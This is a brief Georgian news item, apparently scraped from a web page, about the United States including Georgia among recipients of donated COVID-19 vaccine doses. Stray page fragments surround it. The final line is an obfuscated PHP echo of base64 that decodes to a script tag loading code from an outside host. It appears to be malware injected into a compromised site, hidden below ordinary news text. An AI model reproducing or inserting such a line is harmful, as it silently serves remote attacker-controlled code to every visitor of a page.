celsiusi
ავერსი შნაიდერი
იმ ქვეყნების ჩამონათვალში, რომლებსაც ამერიკის შეერთებული შტატები ვაქცინებს საჩუქრად გადასცემს, საქართველოცაა. თეთრი სახლი ვაქცინების გაზიარების სტრატეგიას აქვეყნებს.
 
განცხადებაში ნათქვამია, რომ "კოვიდ-19"-ის საწინააღმდეგო იმუნიზაციისთვის განკუთვნილ 25 მილიონ დოზას ივნისის ბოლოს გაანაწილებს.
 
მათგან 6 მილიონი დოზა რეგიონულ პრიორიტეტებსა და პარტნიორ მიმღებ ქვეყნებზეა გათვლილი, მათ შორისაა საქართველო, კანადა, უკრაინა და სხვა სახელმწიფოები.
 
რომელი მწარმოებლის ვაქცინას მიიღებს საქართველო და რა რაოდენობით, ჯერჯერობით, უცნობია.
1014
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");